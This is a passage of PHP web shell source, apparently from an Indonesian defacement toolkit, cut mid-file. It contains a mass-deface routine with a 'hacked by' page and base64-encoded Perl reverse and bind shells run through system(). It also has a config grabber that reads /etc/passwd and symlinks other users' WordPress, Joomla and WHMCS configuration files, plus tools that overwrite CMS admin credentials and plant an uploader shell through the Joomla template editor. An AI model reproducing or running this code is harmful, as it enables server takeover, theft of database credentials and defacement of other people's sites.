2617<meta name="robots" content="all" />
2618<meta name="robots schedule" content="auto" />
2619<meta name="distribution" content="global" />
2620<body onload="type_text()" alink="#FFFF00" vlink="#FFFF00" link="#FFFF00" text="#FFFF00">
2621<table height=90% width=100%>
2622<script type="text/javascript">
2623
2624var snowmax=75
2625var snowcolor=new Array("#AAAACC","#DDDDFF","#CCCCDD","#F3F3F3","#F0FFFF")
2626var snowtype=new Array("Arial Black","Arial Narrow","Times","Comic Sans MS")
2627var snowletter="*"
2628var sinkspeed=0.6
2629var snowmaxsize=22
2630var snowminsize=8
2631var snowingzone=1
2632
2633// Do not edit below this line
2634var snow=new Array()
2635var marginbottom
2636var marginright
2637var timer
2638var i_snow=0
2639var x_mv=new Array();
2640var crds=new Array();
2641var lftrght=new Array();
2642var browserinfos=navigator.userAgent
2643var ie5=document.all&&document.getElementById&&!browserinfos.match(/Opera/)
2644var ns6=document.getElementById&&!document.all
2645var opera=browserinfos.match(/Opera/)
2646var browserok=ie5||ns6||opera
2647
2648function randommaker(range) {
2649 rand=Math.floor(range*Math.random())
2650 return rand
2651}
2652
2653function initsnow() {
2654 if (ie5 || opera) {
2655 marginbottom = document.body.clientHeight
2656 marginright = document.body.clientWidth
2657 }
2658 else if (ns6) {
2659 marginbottom = window.innerHeight
2660 marginright = window.innerWidth
2661 }
2662 var snowsizerange=snowmaxsize-snowminsize
2663 for (i=0;i<=snowmax;i++) {
2664 crds[i] = 0;
2665 lftrght[i] = Math.random()*15;
2666 x_mv[i] = 0.03 + Math.random()/10;
2667 snow[i]=document.getElementById("s"+i)
2668 snow[i].style.fontFamily=snowtype[randommaker(snowtype.length)]
2669 snow[i].size=randommaker(snowsizerange)+snowminsize
2670 snow[i].style.fontSize=snow[i].size
2671 snow[i].style.color=snowcolor[randommaker(snowcolor.length)]
2672 snow[i].sink=sinkspeed*snow[i].size/5
2673 if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
2674 if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
2675 if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
2676 if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
2677 snow[i].posy=randommaker(2*marginbottom-marginbottom-2*snow[i].size)
2678 snow[i].style.left=snow[i].posx
2679 snow[i].style.top=snow[i].posy
2680 }
2681 movesnow()
2682}
2683
2684function movesnow() {
2685 for (i=0;i<=snowmax;i++) {
2686 crds[i] += x_mv[i];
2687 snow[i].posy+=snow[i].sink
2688 snow[i].style.left=snow[i].posx+lftrght[i]*Math.sin(crds[i]);
2689 snow[i].style.top=snow[i].posy
2690
2691 if (snow[i].posy>=marginbottom-2*snow[i].size || parseInt(snow[i].style.left)>(marginright-3*lftrght[i])){
2692 if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
2693 if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
2694 if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
2695 if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
2696 snow[i].posy=0
2697 }
2698 }
2699 var timer=setTimeout("movesnow()",50)
2700}
2701
2702for (i=0;i<=snowmax;i++) {
2703 document.write("<span id='s"+i+"' style='position:absolute;top:-"+snowmaxsize+"'>"+snowletter+"</span>")
2704}
2705if (browserok) {
2706 window.onload=initsnow
2707}
2708</script>
2709<td align=center>
2710</head>
2711<body bgcolor="#000000" text="#FFFF00"><center>
2712<font face=courier new>
2713<h1>
2714<font color='red'>hacked by Kapaljetz666</font><p>
2715<font size=3>don't worry, and keep your calm<br>
2716Deface just a game, if you say it's a crime, that mean you're stupid<p>
2717</font>
2718<font face='courier new' size=3>
2719greets for you <a href="http://zone-h.org/archive/notifier=Kapaljetz666" target="_blank">
2720<img src="http://s10.postimg.org/6cc1ngy7p/Cur.png" name="haha you found me" height=20 width=25></img></a>
2721</font>
2722<EMBED ALIGN='CENTER' AUTOSTART='TRUE' HEIGHT='1' LOOP='TRUE' SRC='http://vivat365.com/wp-admin/videoplayback_2.swf' WIDTH='1'></EMBED>
2723</style>
2724</body>
2725</html>
2726</textarea><br>
2727<center><input class='inputzbut' type='submit' value=" Deface "></center></form></table><br></form>
2728<h3>defaced result: </h3>
2729<br><br>
2730versi text area:<br>
2731<textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>
2732<?php $ini="http://";
2733 $mainpath=$_POST[path];
2734 $file=$_POST[file];
2735 $dir=opendir("$mainpath");
2736 $code=base64_encode($_POST[index]);
2737 $indx=base64_decode($code);
2738 while($row=readdir($dir)){
2739 $start=@fopen("$row/$file","w+");
2740 $finish=@fwrite($start,$indx);
2741 if ($finish){echo"$ini$row/$file\n";}}
2742?>
2743</textarea><br>
2744<br><br>versi text:<br><br>
2745<?php $ini="http://";
2746 $mainpath=$_POST[path];
2747 $file=$_POST[file];
2748 $dir=opendir("$mainpath");
2749 $code=base64_encode($_POST[index]);
2750 $indx=base64_decode($code);
2751 while($row=readdir($dir)){
2752 $start=@fopen("$row/$file","w+");
2753 $finish=@fwrite($start,$indx);
2754 if ($finish){echo"<a href="."$ini$row/$file"." target="."_blank".">$ini$row/$file</a><br>";}}
2755
2756?>
2757<?php
2758}
2759elseif(isset($_GET['x']) && ($_GET['x'] == 'sbc')){ @ini_set('output_buffering',0);
2760?>
2761 <form action="?y=<?php echo $pwd; ?>&x=sbc" method="post">
2762 <br><br><center><b><font size=4>Back Connect Simple</font></b></center><br>
2763<?php
2764echo "
2765<head>
2766<link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
2767<form method='POST'>
2768<title>Facebook Brute Force 2014</title>
2769</head>
2770<style>
2771textarea {
2772resize:none;
2773color: #000000 ;
2774border:1px solid red ;
2775border-left: 4px solid red ;
2776}
2777input {
2778color: #000000;
2779border:1px dotted black;
2780}
2781</style>";
2782if ($_REQUEST['cdirname']){
2783if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
2784function bcn($ipbc,$pbc){
2785$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
2786NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
2787MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
2788dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
2789IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
2790YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
2791LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
2792KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
2793KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
2794IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
2795ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
2796$opbc=fopen("bcc.pl","w");
2797fwrite($opbc,base64_decode($bcperl));
2798fclose($opbc);
2799system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
2800}
2801function wbp($wb){
2802$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
2803cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
2804a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
2805ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
2806IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
2807IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
2808VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
2809VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
2810$opwb=fopen("wbp.pl","w");
2811fwrite($opwb,base64_decode($wbp));
2812fclose($opwb);
2813echo getcwd();
2814system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
2815}
2816function lbp($wb){
2817$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
2818YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
2819U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
2820VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
2821QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
2822dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
2823b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
2824Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
2825$oplb=fopen("lbp.pl","w");
2826fwrite($oplb,base64_decode($lbp));
2827fclose($oplb);
2828system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
2829}
2830
2831if($_REQUEST['portbw']){
2832wbp($_REQUEST['portbw']);
2833
2834}if($_REQUEST['portbl']){
2835lbp($_REQUEST['portbl']);
2836}
2837if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
2838bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
2839
2840}
2841echo "<p align='center'><font face='Tahoma' color='#007700' size='2pt' /><p align='center'><br>Ip : <input type=text name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input type=text name=portbc value=5555> <input type=submit value=Connect></form>".$formp."<p align='center'><p align='center'><br><font face='Tahoma' color='#009900' size='2pt'> Windows Bind Port</font> <br>Port : <input type=text name=portbw value=5555> <input type=submit value=Connect></form>".$formp."<p align='center'> <br><font face='Tahoma' color='#009900' size='2pt'>Linux Bind Port</font> <br>Port : <input type=text name=portbl value=5555> <input type=submit value=Connect></form><br><br>".$end;exit;
2842}
2843////////////////////////////////////////////////////////////////////////////
2844elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
2845?>
2846 <form action="?y=<?php echo $pwd; ?>&x=grabc" method="post">
2847 <br><br><center><b><font size=4>Config Grabber !</font></b></center><br>
2848<?php
2849echo "
2850<form method='POST'>
2851</head>
2852<style>
2853textarea {
2854resize:none;
2855color: #000000 ;
2856background-color:#000000;
2857font-size:8pt; color:#FFFF00;
2858border:1px solid white ;
2859border-left: 4px solid white ;
2860width:543px;
2861height:400px;
2862}
2863input {
2864color: #000000;
2865border:1px dotted white;
2866}
2867</style>";
2868echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#007700" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='inputzbut' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('jembutgrab', 0755);@chdir('jembutgrab');
2869$htaccess="
2870OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2871Options Indexes FollowSymLinks
2872ForceType text/plain
2873AddType text/plain .php
2874AddType text/plain .html
2875AddType text/html .shtml
2876AddType txt .php
2877AddHandler server-parsed .php
2878AddHandler txt .php
2879AddHandler txt .html
2880AddHandler txt .shtml
2881Options All
2882Options All";
2883file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
2884$passwd=explode("\n",$passwd);
2885echo "<br><br><center><font color=#b0b000 size=2pt>wait ...</center><br>";
2886foreach($passwd as $pwd){
2887$pawd=explode(":",$pwd);$user =$pawd[0];
2888@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
2889@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
2890@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
2891@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
2892@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
2893@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
2894@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
2895@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
2896@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
2897@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
2898@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
2899@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
2900@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
2901@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
2902@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
2903@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
2904@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
2905@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
2906@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
2907@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
2908@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
2909@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
2910@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
2911@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
2912@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
2913@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
2914@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
2915@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
2916@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
2917@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
2918@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
2919@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
2920@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
2921@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
2922@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
2923@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
2924@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
2925@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
2926@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
2927@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
2928echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="jembutgrab">Open configs</a></font></b>';}
2929}
2930elseif(isset($_GET['x']) && ($_GET['x'] == 'grabwpjm'))
2931 {
2932 ?>
2933 <form action="?path=<?php echo $path; ?>&x=grabwpjm" method="post">
2934<?php
2935// Tu5b0l3d
2936// thx to: IndoXPloit, HNc
2937// Config Wordpress and Joomla Grabber
2938error_reporting(0);
2939 echo "<h1><center>Created By IndoXploit<br><a href='configs/'style='text-decoration:none;'>Open Configs</a></center><br></h1>";
2940//$us = file_get_contents("/etc/passwd");
2941$usa = fopen('/etc/passwd','r');
2942$dir = mkdir('configs', 0777);
2943$rrrr = "Options all \n DirectoryIndex configs.html \n Require None \n Satisfy Any";
2944$frr = fopen('configs/.htaccess', 'w');
2945
2946fwrite($frr, $rrrr);
2947while($us = fgets($usa)){
2948if($us==""){
2949 echo "cann't read /etc/passwd";
2950}
2951else{
2952preg_match_all('/(.*?):x:/', $us, $user_byk);
2953
2954 foreach($user_byk[1] as $user){
2955 $dir1 = "/home/$user/public_html/";
2956 if(is_readable($dir1)){
2957 $dir = "/home/$user/public_html/wp-config.php";
2958 $dir2 = "/home/$user/public_html/configuration.php";
2959 $ambil = file_get_contents($dir);
2960
2961
2962 if($ambil==""){
2963 $ambil_joom = file_get_contents($dir2);
2964 if($ambil_joom==""){
2965 echo "<font color='green'>$user <= Readable (Bukan Wordpress dan Joomla)<br></font>";
2966
2967 }
2968 else{
2969
2970 $file1 = "grabwpjm/$user-configuration.txt";
2971 $fp2 = fopen($file1,"w");
2972 fputs($fp2,$ambil);
2973
2974 echo "<a href='grabwpjm/$user-configuration.txt'style='text-decoration:none;'>$user </a> <= Joomla<br>";
2975
2976 }
2977
2978 }
2979 else{
2980
2981 $file1 = "grabwpjm/$user-wpconfig.txt";
2982 $fp2 = fopen($file1,"w");
2983 fputs($fp2,$ambil);
2984
2985 echo "<a href='grapwpjm/$user-wpconfig.txt'style='text-decoration:none;'>$user </a> <= Wordpress<br>";
2986
2987 }
2988
2989
2990 }
2991 else{
2992
2993
2994 }
2995
2996 }
2997
2998}
2999
3000}
3001
3002}
3003elseif(isset($_GET['x']) && ($_GET['x'] == 'joom'))
3004 {
3005 ?>
3006 <form action="?path=<?php echo $path; ?>&x=joom" method="post">
3007<?php
3008error_reporting(0);
3009//Tu5b0l3d
3010
3011//thx to: IndoXploit, Hacker-Newbie.org
3012
3013
3014
3015 if($_POST['submitt']){
3016
3017
3018 $host = $_POST['host'];
3019
3020 $username = $_POST['username'];
3021
3022 $password = $_POST['password'];
3023
3024 $db = $_POST['db'];
3025
3026 $dbprefix = $_POST['dbprefix'];
3027
3028 $user_baru = $_POST['user_baru'];
3029
3030 $password_baru = $_POST['password_baru'];
3031
3032 $tanya = $_POST['tanya'];
3033
3034
3035 $prefix = $dbprefix."users";
3036
3037 $pass = md5("$password_baru");
3038
3039 $upda = $db.".".$dbprefix;
3040
3041
3042 mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
3043
3044 mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
3045
3046 $tampil=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3047 $r=mysql_fetch_array($tampil);
3048 $id = $r[id];
3049
3050
3051 mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
3052
3053
3054 function token($target){
3055 $ch2 = curl_init ("$target");
3056 curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
3057 curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
3058 curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3059 curl_setopt ($ch2, CURLOPT_CONNECTTIMEOUT, 5);
3060 curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
3061 curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
3062 curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
3063 curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
3064 $data = curl_exec ($ch2);
3065
3066
3067 preg_match('/<input type="hidden" name="(.*?)" value="1"/', $data, $token);
3068 $token = $token[1];
3069 return $token;
3070 }
3071
3072 if ($tanya == "y"){
3073 $target = $_POST['target'];
3074 $path = "/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA%3D%3D";
3075 $site = $target.$path;
3076 $token1 = token($site);
3077
3078
3079
3080$post = array(
3081 "username" => "$user_baru",
3082 "passwd" => "$password_baru",
3083 "lang" => "en-GB",
3084 "option" => "com_login",
3085 "task" => "login",
3086 "return" => "aW5kZXgucGhw",
3087 "$token1" => "1",
3088 );
3089
3090$ch = curl_init ("$site");
3091curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
3092curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
3093curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3094curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
3095curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
3096curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
3097curl_setopt ($ch, CURLOPT_POST, 1);
3098@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
3099curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
3100curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
3101$masuk = curl_exec ($ch);
3102
3103$token2 = token($site);
3104
3105$upload = base64_decode("Z3cgZ2FudGVuZw0KPD9waHANCiAgJGZpbGUgPSAkX0ZJTEVTWydmaWxlJ107DQogICRuZXdmaWxlPSJrLnBocCI7DQoJCWlmIChmaWxlX2V4aXN0cygiLi4vLi4vIi4kbmV3ZmlsZSkpIHVubGluaygiLi4uLi8vIi4kbmV3ZmlsZSk7DQogICAgCW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZVsndG1wX25hbWUnXSwgIi4uLy4uLyRuZXdmaWxlIik7DQo/Pg0K");
3106
3107$post2 = array(
3108 "jform[source]" => "$upload",
3109 "task" => "template.save",
3110 "$token2" => "1",
3111 "jform[extension_id]"=> "503",
3112 "jform[filename]" => "/error.php",
3113 );
3114
3115$ch3 = curl_init ("$site");
3116curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
3117curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
3118curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3119curl_setopt ($ch3, CURLOPT_CONNECTTIMEOUT, 5);
3120curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
3121curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
3122curl_setopt ($ch3, CURLOPT_POST, 1);
3123curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
3124curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
3125curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
3126$masuk2 = curl_exec ($ch3);
3127
3128if(preg_match("#successfully#is", $masuk2)){
3129echo "uploader udh ketanem...<br>";
3130echo "lanjut mepes...<br>";
3131
3132$file_pepes = "hacked.php";
3133$ch4 =curl_init("$target/templates/beez3/error.php");
3134 curl_setopt($ch4, CURLOPT_POST, true);
3135 curl_setopt($ch4, CURLOPT_POSTFIELDS,
3136 array('file'=>"@$file_pepes"));
3137 curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
3138 curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
3139 curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
3140 $postResult = curl_exec($ch4);
3141 curl_close($ch4);
3142
3143
3144 $ch5 =curl_init("$target/k.php");
3145 curl_setopt($ch5, CURLOPT_POST, true);
3146 curl_setopt($ch5, CURLOPT_RETURNTRANSFER, 1);
3147 curl_setopt ($ch5, CURLOPT_SSL_VERIFYPEER, 0);
3148 curl_setopt ($ch5, CURLOPT_SSL_VERIFYHOST, 0);
3149 $postResult2 = curl_exec($ch5);
3150
3151
3152 if(preg_match('#hacked#is', $postResult2)){
3153 echo "<font color='green'>berhasil mepes...</font><br>";
3154 echo "$target/k.php<br>";
3155 }
3156 else{
3157 echo "<font color='red'>gagal mepes...</font><br>";
3158 echo "coba aja manual: <br>";
3159 echo "$target/administrator<br>";
3160 echo "username: $user_baru<br>";
3161 echo "password: $password_baru<br>";
3162 }
3163
3164
3165
3166}
3167else{
3168 echo "failed<br>";
3169 echo "data udh bener. beda template mungkin :(<br>";
3170 echo "coba aja manual: <br>";
3171 echo "$target/administrator<br>";
3172 echo "username: $user_baru<br>";
3173 echo "password: $password_baru<br>";
3174}
3175
3176
3177curl_close($ch3);
3178curl_close($ch);
3179
3180
3181
3182
3183
3184 }
3185 elseif($tanya == "n"){
3186 echo "Sukses<br>";
3187 echo "username: $user_baru<br>";
3188 echo "password: $password_baru<br>";
3189
3190 }
3191
3192
3193 }
3194
3195
3196
3197 else{
3198
3199 echo '<html>
3200
3201 <head>
3202
3203 <title>Edit user in joomla</title>
3204
3205 </head>
3206
3207
3208
3209 <body>
3210
3211 <center>
3212
3213 <center
3214
3215 <h2>Edit user in joomla</h2>
3216
3217 <table>
3218
3219 <tr><td><form method="post" action="?action"></td></tr>
3220
3221 <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
3222
3223 <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
3224
3225 <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
3226
3227 <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
3228
3229 <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
3230
3231 <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
3232
3233 <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
3234 <tr><td></td></tr>
3235 <tr><td></td></tr>
3236
3237
3238 <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
3239 <tr><td><input type="text" name="target" placeholder="www.IndoXploit.org"></td></tr>
3240
3241 <tr><td><input type="submit" value="Submit" name="submitt"></td></tr>
3242
3243 </table>
3244 *nb: Masukin script deface anda hacked.php. kalo milih y ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih n
3245
3246 </center>
3247
3248 </body>';
3249
3250 }
3251
3252
3253
3254}
3255elseif(isset($_GET['x']) && ($_GET['x'] == 'ggwp'))
3256 {
3257 ?>
3258 <form action="?path=<?php echo $path; ?>&x=ggwp" method="post">
3259<?php
3260 if($_POST){
3261 $host = $_POST['host'];
3262 $username = $_POST['username'];
3263 $password = $_POST['password'];
3264 $db = $_POST['db'];
3265 $dbprefix = $_POST['dbprefix'];
3266 $user_baru = $_POST['user_baru'];
3267 $password_baru = $_POST['password_baru'];
3268 $prefix = $db.".".$dbprefix."users";
3269 $sue = $db.".".$dbprefix."options";
3270 $tanya = $_POST['tanya'];
3271 $target = $_POST['target'];
3272 $nick = $_POST['nick'];
3273 $pass = md5("$password_baru");
3274
3275
3276 mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
3277 mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
3278
3279 $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
3280 $r=mysql_fetch_array($tampil);
3281 $id = $r[ID];
3282
3283 $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
3284 $r2=mysql_fetch_array($tampil2);
3285 $target = $r2[option_value];
3286
3287
3288 mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
3289
3290
3291
3292
3293 if($tanya=="y"){
3294
3295 function ambilKata($param, $kata1, $kata2){
3296 if(strpos($param, $kata1) === FALSE) return FALSE;
3297 if(strpos($param, $kata2) === FALSE) return FALSE;
3298 $start = strpos($param, $kata1) + strlen($kata1);
3299 $end = strpos($param, $kata2, $start);
3300 $return = substr($param, $start, $end - $start);
3301 return $return;
3302}
3303
3304 function anucurl($sites){
3305 $ch1 = curl_init ("$sites");
3306curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
